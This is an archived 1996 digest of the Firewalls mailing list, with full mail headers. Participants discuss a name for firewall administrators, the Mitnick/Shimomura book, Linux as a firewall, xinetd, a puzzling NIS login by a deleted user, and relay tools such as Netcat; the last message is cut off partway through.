MAA29615; Mon, 15 Jan 1996 12:53:01 -0500 Date: Mon, 15 Jan 1996 12:53:01 -0500 (EST) From: Brain21 To: Shawn Steele cc: Firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <9601121030.ZM24307@aob.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Shawn Steele wrote: > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > Firemaster? > How about Firemarshall-Bill? Or just plain Firemarshall? Brain21 From firewalls-owner Mon Jan 15 12:10:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14233 for firewalls-outgoing; Mon, 15 Jan 1996 09:54:39 -0800 (PST) Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14207 for ; Mon, 15 Jan 1996 09:54:28 -0800 (PST) Received: by Disclosure.COM (4.1/SMI-4.1) id AA20780; Mon, 15 Jan 96 12:57:09 EST Date: Mon, 15 Jan 1996 12:57:07 -0500 (EST) From: Scott Barman To: Mark_W_Loveless@smtp.bnr.com Cc: firewalls@greatcircle.com Subject: Re: The Last Mitnick Post/Thread In-Reply-To: <9600158217.AA821727627@smtp.bnr.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 15 Jan 1996 Mark_W_Loveless@smtp.bnr.com wrote: > Most everyone is speculating on things we know nothing about. I can > only assume hackers hope we spend all our time talking about them and > not looking for them on our systems. > > The definitive book on Mitnick is The Fugitive Game by Jonathan > Littman. A lot of it is Mitnick's own words. Well written, much better > than Markoff's "hype"rspace writings. Dateline (on NBC) had a report of Shimomura's side of the story last Friday. I don't know if they put anything about it on their web site but you can try www.nbc.com. One of the reasons for this was to hype the book by Shimomura and the writer of the New York Times articles that followed. Please don't ask me about the book (I can't even remember the title). All I remember were the authors and that it was released last week. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." - scott barman From firewalls-owner Mon Jan 15 12:17:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA14245 for firewalls-outgoing; Mon, 15 Jan 1996 09:54:44 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA14227 for ; Mon, 15 Jan 1996 09:54:33 -0800 (PST) Received: by inet1.tek.com id ; Mon, 15 Jan 1996 09:53:38 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma015097; Mon Jan 15 09:46:29 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA09933; Mon, 15 Jan 96 06:53:07 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA02817; Mon, 15 Jan 96 06:54:36 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA06293; Mon, 15 Jan 96 06:52:21 PST Date: Mon, 15 Jan 1996 06:52:18 -0800 (PST) From: Kent Dahlgren To: Dana Brewer Cc: firewalls@greatcircle.COM Subject: Re: Linux as a firewall In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Dana Brewer wrote: > I've noticed that a lot of people say they use Linux as part of their > Internet firewall. But now I've had a company tell me that Linux isn't a > true multi-tasking operating system, so it shouldn't be used as a > firewall. What's the true story here? Ideally, in our situation, the > bastion host would be the firewall, the WWW server, the ftp server, the > Usenet news server, etc... Is this completely unrealistic? > Again, I don't know all.... I like LINUX, and I feel that it is a true multi tasking OS. But I'm not a CS genius. I personally object to using it as part of a Internet firewall simply because of this; think of the unknown multitudes of people out there who have entirely too much time on thier hands (like me) who have the source code of this OS and can spend all kinds of time hacking and re hacking our own boxes. I don't feel that LINUX is a good choice for a firewall. Do you have any idea how many hacks there are for LINUX? There may be as many holes for Solaris or IRIX, but that stuff isn't free. LINUX is. My 25 cents worth. ______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Mon Jan 15 12:40:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA21909 for firewalls-outgoing; Mon, 15 Jan 1996 12:23:41 -0800 (PST) Received: from directors.rdl.co.uk (directors.rdl.co.uk [193.119.77.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA21903 for ; Mon, 15 Jan 1996 12:23:36 -0800 (PST) Received: (from andy@localhost) by directors.rdl.co.uk (8.7.3/8.7.3) id UAA27001; Mon, 15 Jan 1996 20:22:35 GMT Date: Mon, 15 Jan 1996 20:22:35 GMT Message-Id: <199601152022.UAA27001@directors.rdl.co.uk> From: "Andy Gay (3272)" To: firewalls@GreatCircle.com CC: andy@directors.rdl.co.uk Subject: xinetd on the firewall host Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know the usual advice is to disable as much inetd stuff as possible on the firewall host, but it'd be handy to have telnet, rlogin, ftp etc available sometimes. I'd like to think that could be done safely using xinetd to control access. Is this a common approach? I've not seen much discussion of xinetd here - perhaps this isn't the place, but I wonder if anyone has any concerns about its security. Also, does anyone know if a Solaris 2 port has been done? -- Andy From firewalls-owner Mon Jan 15 12:41:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA19438 for firewalls-outgoing; Mon, 15 Jan 1996 11:15:33 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA19424 for ; Mon, 15 Jan 1996 11:15:28 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id OAA29783; Mon, 15 Jan 1996 14:13:09 -0500 Date: Mon, 15 Jan 1996 14:13:09 -0500 (EST) From: Brain21 To: Berry Kercheval cc: firewalls@GreatCircle.COM, kerch@parc.xerox.com Subject: Re: "Q" Clearance In-Reply-To: <96Jan13.105836pst.34953@reynaldo.parc.xerox.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 13 Jan 1996, Berry Kercheval wrote: > It's really not that hard. Top Secret is a Department of Defense clearance > level. "Q" is a Department of Energy clearance level. This all strikes me as odd. When my father did work for that sub-contractor (I *know* that it was for the DoD, and not the DoE, although he *may* have done work for them as well, but I don't ever recall him mentioning DoE), he had what he called "Q" clearance. This was before I knew that there were different clearance "names" for different agencies (I figured that the names were universal accross all departments, but were exclusive to that department). When he left that company he went to work somewhere else. These people told him that his "Q" clearance simply was not good enough for the work that he was going to be doing, and he had to wait for clearance before he knew if he got the job (there were other factors involved as well, but this is the important one). I say it is odd, because prior to his changing jobs I had only heard of DoD terms, and I *had* heard of "Q" clearance. Is there not, perhaps, something in the DoD that is similar in pronounciation? I'll have to call and ask him. > > The DoD controls all the military in the US. The DoE controls research, Well, these two, and other agencies *do* have duties that overlap, but the goes w/o saying. Brain21 From firewalls-owner Mon Jan 15 13:06:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA22281 for firewalls-outgoing; Mon, 15 Jan 1996 12:29:12 -0800 (PST) Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA22276 for ; Mon, 15 Jan 1996 12:29:07 -0800 (PST) Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id PAA22529; Mon, 15 Jan 1996 15:25:32 -0500 (EST) Received: from smtplink.jabil.com by mail.jabil.com id aa25191; 15 Jan 96 15:21 EST Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821748176; Mon, 15 Jan 96 15:19:15 EST Date: Mon, 15 Jan 96 15:19:15 EST From: Kyle Amon Message-Id: <9600158217.AA821748176@jabil.com> To: Firewalls@greatcircle.com, Carolina Elortegui Subject: Re: SunOS, NIS and some intruder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It's unlikely, but possible that the user has created a "vanishing account" with judicious use of the cron facilities. The account could appear and disappear at predetermined intervals making it somewhat harder to detect. Just an idea, Kyle Amon System Administrator kyle_amon@jabil.com Jabil Circuit, Inc. ______________________________ Reply Separator _________________________________ Subject: SunOS, NIS and some intruder Author: Carolina Elortegui at Smtplink_South Date: 1/10/96 7:56 AM I just want some help understanding a fact happens here on friday. I'm the sysadmin in a lab with 4 HP and 2 Suns. I have work a lot with the HP, but almost never with the Suns, because there was another person that did it. This person let the lab, and now I have to learn about SunOS and BSD-like UNIX. There is a NIS server lets call it "A" and there is a NIS client lets call it "B". On thursday I delete a user from both systems, because we don't want him to access our net. On friday I found that the "user" I deleted the day before, accesed "B", and he has no login in the /etc/passwd; /etc/group, etc. I was looking with the last command what did happened, and I saw that the user accesed plenty times machine "B" that day. I am really new in sysadmin labors in the Sun machines, I really know HP-UX. Maybe there is something I don't know is happening with the NIS service and something about the Yellow Pages service. I have to tell you that the person that was here before me, just let the Suns like there where. I don't know what did they do there, I am knowing it rigth now. Thanks for helping me -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Carolina Elortegui Laboratorio de Postgrado Universidad Central de Venezuela Administrador Facultad de Ciencias Escuela de Computacion E-mail: celort@kuma.ciens.ucv.ve ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Mon Jan 15 13:14:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA20561 for firewalls-outgoing; Mon, 15 Jan 1996 12:05:14 -0800 (PST) Received: from sun4nl.NL.net (sun4nl.NL.net [193.78.240.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA20536 for ; Mon, 15 Jan 1996 12:05:07 -0800 (PST) Received: from lvp by sun4nl.NL.net via EUnet id AA13665 (5.65b/CWI-3.3); Mon, 15 Jan 1996 21:04:06 +0100 Received: (from eddie@localhost) by lvp.lvp.nl (8.6.9/8.6.9) id UAA28392; Mon, 15 Jan 1996 20:21:01 +0100 Date: Mon, 15 Jan 1996 20:21:01 +0100 From: Eddie Penninkhof Subject: Logging in into a firewall To: Firewalls Mailinglist Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd like users, who have dynamic IP-adresses, to be able to access a host behind a firewall, after an username/password verification. Are there any standard-protocols for logging in into a firewall? Are there any Linux implementations of those protcols? CU, Eddie. From firewalls-owner Mon Jan 15 13:40:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA26154 for firewalls-outgoing; Mon, 15 Jan 1996 13:34:42 -0800 (PST) Received: from netsys.com (netsys.com [198.175.9.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA26149 for ; Mon, 15 Jan 1996 13:34:38 -0800 (PST) Received: (from len@localhost) by netsys.com (8.6.11/NETSYS-LEN) id NAA01752 for firewalls@greatcircle.com; Mon, 15 Jan 1996 13:33:15 -0800 X-Phone: 415-385-1085 X-Mailer: Z-Mail (3.2.0 06sep94) Received: (from len@localhost) by netsys.com (8.6.11/NETSYS-LEN) id NAA01736; Mon, 15 Jan 1996 13:31:15 -0800 From: "Len Rose" Message-Id: <9601151331.ZM1734@netsys.com> Date: Mon, 15 Jan 1996 13:31:14 -0800 In-Reply-To: Scott Barman "Re: The Last Mitnick Post/Thread" (Jan 15, 12:57pm) References: X-Phone: 415-385-1085 X-Mailer: Z-Mail (3.2.0 06sep94) To: Scott Barman Subject: Re: The Last Mitnick Post/Thread Cc: firewalls@netsys.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Markoff, and Tsutomo acted reprehensibly by quoting sniffer sessions with Kevin and jsz in which my site was mentioned. Not only were the facts wrong as jsz never had my firewall router passwords, jsz never knew that much about Cisco routers in general. I am extremely annoyed that when they did explain who/what netsys.com/Len Rose is, they only bothered to mention the past and not what I have achieved since 1992. No one from their ghost writing teams ever contacted me to get the facts either. If the government is interested in talking to jsz as has been rumored then they should go ahead, and if not, then perhaps someone could clear jsz's name which seems to be pretty muddied by the somewhat irresponsible literary excesses which seem to fill the Tsutomo/Markoff book. Firewalls isn't really the appropriate platform for this sort of discussion, and I apologize for continuing this thread :-) Regards, Len On Jan 15, 12:57pm, Scott Barman wrote: > Subject: Re: The Last Mitnick Post/Thread > On Mon, 15 Jan 1996 Mark_W_Loveless@smtp.bnr.com wrote: > > > Most everyone is speculating on things we know nothing about. I can > > only assume hackers hope we spend all our time talking about them and > > not looking for them on our systems. > > > > The definitive book on Mitnick is The Fugitive Game by Jonathan > > Littman. A lot of it is Mitnick's own words. Well written, much better > > than Markoff's "hype"rspace writings. > > Dateline (on NBC) had a report of Shimomura's side of the story last > Friday. I don't know if they put anything about it on their web site > but you can try www.nbc.com. One of the reasons for this was to hype > the book by Shimomura and the writer of the New York Times articles > that followed. > > Please don't ask me about the book (I can't even remember the title). > All I remember were the authors and that it was released last week. > > scott barman > -- > scott barman DISCLAIMER: I speak to anyone who will listen, > scott@disclosure.com and I speak only for myself. > barman@ix.netcom.com > "Micro$oft and Windoze/NT will be the cause of the de-evolution of > network security just as the original PC and BASIC was the cause of > the de-evolution of programming." - scott barman > >-- End of excerpt from Scott Barman -- len@netsys.com http://www.netsys.com From firewalls-owner Mon Jan 15 14:10:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA27013 for firewalls-outgoing; Mon, 15 Jan 1996 13:49:11 -0800 (PST) Received: from border.dreamworks.com (dreamworks.com [204.250.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA27001 for ; Mon, 15 Jan 1996 13:49:05 -0800 (PST) Received: from border.dreamworks.com (daemon@localhost) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id NAA25913 for ; Mon, 15 Jan 1996 13:34:25 -0800 Received: from gateway (gateway.dreamworks.com [10.1.1.2]) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id NAA25907 for ; Mon, 15 Jan 1996 13:34:25 -0800 Received: from juice.dreamworks.com by gateway (SMI-8.6/SMI-SVR4) id NAA17570; Mon, 15 Jan 1996 13:47:51 -0800 Received: by juice.dreamworks.com (940816.SGI.8.6.9/940406.SGI.AUTO) id NAA17170; Mon, 15 Jan 1996 13:51:06 -0800 From: "Alan C.Horn" Message-Id: <9601151351.ZM17168@juice.dreamworks.com> Date: Mon, 15 Jan 1996 13:51:04 -0800 In-Reply-To: Brain21 "Re: "Q" Clearance" (Jan 15, 2:13pm) References: X-Mailer: Z-Mail (3.2.2 10apr95 MediaMail) To: Brain21 Subject: Re: "Q" Clearance Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Quite frankly guys, who cares about Ministry of Silly Walks security clearance... Can we get back to firewalls please ? Thanks Al From firewalls-owner Mon Jan 15 14:55:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29764 for firewalls-outgoing; Mon, 15 Jan 1996 14:36:07 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA29757 for ; Mon, 15 Jan 1996 14:36:00 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id QAA23226 for GreatCircle.COM!Firewalls; Mon, 15 Jan 1996 16:14:41 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA12857; 15 Jan 96 16:16:05 CST (Mon) Received: by sonic.nmti.com; id AA00346; Mon, 15 Jan 1996 15:44:30 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601152144.AA00346@sonic.nmti.com.nmti.com> Subject: Re: "Title for Firewall Admin? To: brain21@montag33.residence.gatech.edu (Brain21) Date: Mon, 15 Jan 1996 15:44:30 -0600 (CST) Cc: shawn@aob.org, Firewalls@GreatCircle.COM In-Reply-To: from "Brain21" at Jan 15, 96 12:53:01 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think "Gatekeeper" is definitely the most practical one, for a "required" "standard" email address. From firewalls-owner Mon Jan 15 15:12:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA01553 for firewalls-outgoing; Mon, 15 Jan 1996 15:08:58 -0800 (PST) Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA01548 for ; Mon, 15 Jan 1996 15:08:54 -0800 (PST) Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id SAA14745; Mon, 15 Jan 1996 18:10:31 -0500 (EST) Received: from smtplink.jabil.com by mail.jabil.com id aa26726; 15 Jan 96 18:06 EST Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821758074; Mon, 15 Jan 96 17:31:21 EST Date: Mon, 15 Jan 96 17:31:21 EST From: Kyle Amon Message-Id: <9600158217.AA821758074@jabil.com> To: shawn@aob.org, Brain21 Cc: Firewalls@greatcircle.com Subject: Re[2]: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I still like "gatekeeper". My $0.02. Kyle Amon System Administrator kyle_amon@jabil.com Jabil Circuit, Inc. ______________________________ Reply Separator _________________________________ Subject: Re: "Title for Firewall Admin? Author: Brain21 at Smtplink_South Date: 1/15/96 4:08 PM On Fri, 12 Jan 1996, Shawn Steele wrote: > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > Firemaster? > How about Firemarshall-Bill? Or just plain Firemarshall? Brain21 From firewalls-owner Mon Jan 15 15:25:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29593 for firewalls-outgoing; Mon, 15 Jan 1996 14:31:57 -0800 (PST) Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA29587 for ; Mon, 15 Jan 1996 14:31:52 -0800 (PST) Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id RAA03049; Mon, 15 Jan 1996 17:30:12 -0500 Received: by shlep.sware.com (5.65/2.0) from guinan.sware.com id AA24477; Mon, 15 Jan 96 17:26:09 -0500 Received: by guinan.sware.com (AIX 3.2/UCB 5.64/2.1) from localhost id AA27516; Mon, 15 Jan 1996 17:22:48 -0500 Message-Id: <9601152222.AA27516@guinan.sware.com> From: Shan Bell X-Mailer: SecureMail [2.3.1] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Cc: Ken Hays , Dave Kennedy , Shawn Steele , Firewalls@GreatCircle.COM To: Brain21 Subject: Re: "Title for Firewall Admin? In-Reply-To: Your message of Mon, 15 Jan 1996 13:01:31 -0500 (EST). Date: Mon, 15 Jan 96 17:22:48 EST Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brain21 writes: > On Fri, 12 Jan 1996, Ken Hays wrote: > > > >Remember "Ghostbusters?" There was the gatekeeper and the keymaster. > > > > I would suggest that keymaster be reserved for the Kerberos administrator. > > > I think Gozer was the keymaster, does anyone remember the Gatekeepers > name? > > Brain21 > Zuul was the Gatekeeper. The Keymaster's name sounded like "Vince Klaartu" to me. Gozer was the god(dess?) behind it all. Shannon Bell Email: shan.bell@sware.com - Voice: +1 404 321 6597 x163 - Fax: +1 404 315 0293 SecureWare, Inc. / 2957 Clairmont Rd Suite 200 / Atlanta GA 30329-1647 GCS -d+@ H>++ s+:- g+ p?>!p !au>* a- w+ v- C++$ U[BLUAVHSCX]++++$ P+ L+>+++ 3>+++ E- !N>N++ K W M+ V- -po+ Y+ t+>+(+++) 5+ j R(+) G'('') tv+ b+++ !D B-- e++ u** h--- f+ r+++ n-- y+++ From firewalls-owner Mon Jan 15 15:40:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29680 for firewalls-outgoing; Mon, 15 Jan 1996 14:34:10 -0800 (PST) Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA29663 for ; Mon, 15 Jan 1996 14:34:02 -0800 (PST) Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id RAA10715; Mon, 15 Jan 1996 17:35:38 -0500 (EST) Received: from smtplink.jabil.com by mail.jabil.com id aa26487; 15 Jan 96 17:31 EST Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821755980; Mon, 15 Jan 96 17:27:34 EST Date: Mon, 15 Jan 96 17:27:34 EST From: Kyle Amon Message-Id: <9600158217.AA821755980@jabil.com> To: Firewalls@greatcircle.com, Eric Wieling Subject: Re: TCP and UDP relay software. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Check out something called Netcat by . It's a pretty flexible little tool that I believe will do your bidding. Kyle Amon System Administrator kyle_amon@jabil.com Jabil Circuit, Inc. ______________________________ Reply Separator _________________________________ Subject: TCP and UDP relay software. Author: Eric Wieling at Smtplink_South Date: 1/14/96 7:34 PM Our network is divided into several segments, none are considered "trusted". I am looking for a daemon that I can run on the firewall that can take incoming TCP connections or UDP datagrams and forward them to a prespecified host. Mostly I want users on several of the segment to be able to telnet to some port, and have the connection relayed to an outside service such as Lexus/Nexus, or WestLaw. I have searched high and low and simply cannot find such software. I understand that the application for this is rather limited. People tend to want to be able to telnet to any host they want. I could use some SOCKS aware telnet program I suppose, but there don't seem to be many SOCKS aware telnet clients for MS-Windows. Regards, Eric -- Eric Wieling Network Operations Center Inter Commerce Corporation From firewalls-owner Mon Jan 15 15:51:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA29681 for firewalls-outgoing; Mon, 15 Jan 1996 14:34:12 -0800 (PST) Received: from renoir.cftnet.com (renoir.cftnet.com [163.125.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA29664 for ; Mon, 15 Jan 1996 14:34:02 -0800 (PST) Received: from mail.jabil.com (mail.jabil.com [163.125.33.5]) by renoir.cftnet.com (8.7.1/8.6.4) with SMTP id RAA10693; Mon, 15 Jan 1996 17:35:32 -0500 (EST) Received: from smtplink.jabil.com by mail.jabil.com id aa26477; 15 Jan 96 17:31 EST Received: from cc:Mail SMTPLINK 2.1 by jabil.com id AA821755975; Mon, 15 Jan 96 17:00:14 EST Date: Mon, 15 Jan 96 17:00:14 EST From: Kyle Amon Message-Id: <9600158217.AA821755975@jabil.com> To: dana@nav.cc.tx.us, Phil Howard Cc: firewalls@greatcircle.com Subject: Re[2]: Linux as a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Check out the January '96 issue of Sys Admin for a pretty good article on Linux as a firewall. Actually, the issues main focus is on Linux. Kyle Amon System Administrator kyle_amon@jabil.com Jabil Circuit, Inc. ______________________________ Reply Separator _________________________________ Subject: Re: Linux as a firewall Author: Phil Howard at Smtplink_South Date: 1/12/96 9:33 PM Dana Brewer writes... > I've noticed that a lot of people say they use Linux as part of their > Internet firewall. But now I've had a company tell me that Linux isn't a > true multi-tasking operating system, so it shouldn't be used as a > firewall. What's the true story here? Ideally, in our situation, the > bastion host would be the firewall, the WWW server, the ftp server, the > Usenet news server, etc... Is this completely unrealistic? Anyone that says Linux is not a true multi-tasking system should not be believed in anything they say. Wanna bet it was a salesman that would profit from your decision to purchase his product instead of rolling your own? I would not even consider whatever product that company sells, now, unless it was just the "opinion" of a particular salesman, in which case if you do decide to buy their product(s), I would find someone else to make the sale with. Anyone that says they don't know if Linux is a true multi-tasking system or not can only be accused of not knowing about Linux. But anyone who is knowledgeable about systems and has examined Linux can only conclude that it is real. IMHO: it's more real that just about anything else out there. What you should be asking is if Linux can be used to solve your Internet security problems. I cannot answer that. Linux can be used to solve some people's problems. But it isn't everything to everyone. There is not an 800 number to call and have a technician fly out that night to come fix your system after it burns itself down. Some manager types that wear ties all day feel all comfy when there is a Tech "Support" line to call. Me, personally, I don't, because I'm the one that has had to call those lines, and stay on hold, and get transferred around, put up with the multi-level menus that don't have anything about my problem, and then get some bozo that can only barely tell you what the next version number is that you need to wait for. I've had SOME of these kinds of problems with the tech "support" line of every company I've ever had to call such numbers from. But then, I'm a technical person, and I know what to do to fix things myself, only if I have the resources to do it with (e.g. original source code that was reasonably written and compilable). In many cases I had to call the 800 number because that is what I was supposed to do, but I ended up given them the solution. But not everyone fits in that category. You have to make the decision yourself about what is appropriate for you. I can reassure you that many people do use Linux for firewalls and are very happy with it. I don't at my day job, but that was what was decided by people higher up before they even knew of Linux. With Linux, you will have to do a lot more yourself. I suggest you get a copy and install it, run it, and play around with it, and see if you feel comfortable with it. You're sure to run into some problems. Try to fix them with the help of people on the comp.os.linux.* newsgroups and see if that works for you. If it does, then give it a shot as a firewall. If not, try something else. Or if it is feasible, try more than one at a time. Good luck. -- Phil Howard KA9WGN +-------------------------------------------------+ Linux Consultant | The enemy of my enemy is NOT my friend... | Milepost Services | ...but he is a convenient ally! | phil@milepost.com +-------------------------------------------------+ From firewalls-owner Mon Jan 15 19:10:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA12129 for firewalls-outgoing; Mon, 15 Jan 1996 18:58:51 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id SAA12124 for ; Mon, 15 Jan 1996 18:58:42 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id NAA26297; Tue, 16 Jan 1996 13:27:44 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA20494; Tue, 16 Jan 1996 13:27:21 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <9601160257.AA20494@bunya.awadi> Subject: Re: "Title for Firewall Admin? To: shan.bell@sware.com (Shan Bell) Date: Tue, 16 Jan 1996 13:27:21 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <9601152222.AA27516@guinan.sware.com> from "Shan Bell" at Jan 15, 96 05:22:48 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Shan Bell: > >Zuul was the Gatekeeper. The Keymaster's name sounded like "Vince >Klaartu" to me. Gozer was the god(dess?) behind it all. > Cannot remember the names but this thread does bring to mind one of my favourite lines: "Do you want the body of this mortal?" "Is this a trick question?" (Bill Murray...) though I did like "OK.... so... she's a dog" -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Mon Jan 15 19:40:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA13787 for firewalls-outgoing; Mon, 15 Jan 1996 19:35:22 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id TAA13773 for ; Mon, 15 Jan 1996 19:35:16 -0800 (PST) Message-Id: <199601160335.TAA13773@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA067592951; Tue, 16 Jan 1996 14:29:11 +1100 From: Darren Reed Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura To: brain21@montag33.residence.gatech.edu (Brain21) Date: Tue, 16 Jan 1996 14:29:11 +1100 (EDT) Cc: del@giant.IntraNet.com, Firewalls@GreatCircle.COM In-Reply-To: from "Brain21" at Jan 15, 96 01:12:09 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Brain21, sie said: [...] > My father did NOTHING that would even insinuate that there is ANYTHING to > arrest him for (sheesh! Some people need everthing spelled out > explicitly, I think), but he was NOT educated either by his company OR > the government as to these issues. I really don't think anyone said > anything to him other than a passing "don't send this stuff out over the > net. The net is for administrative email between offices, like arranging > business trips, etc. and asking for fax 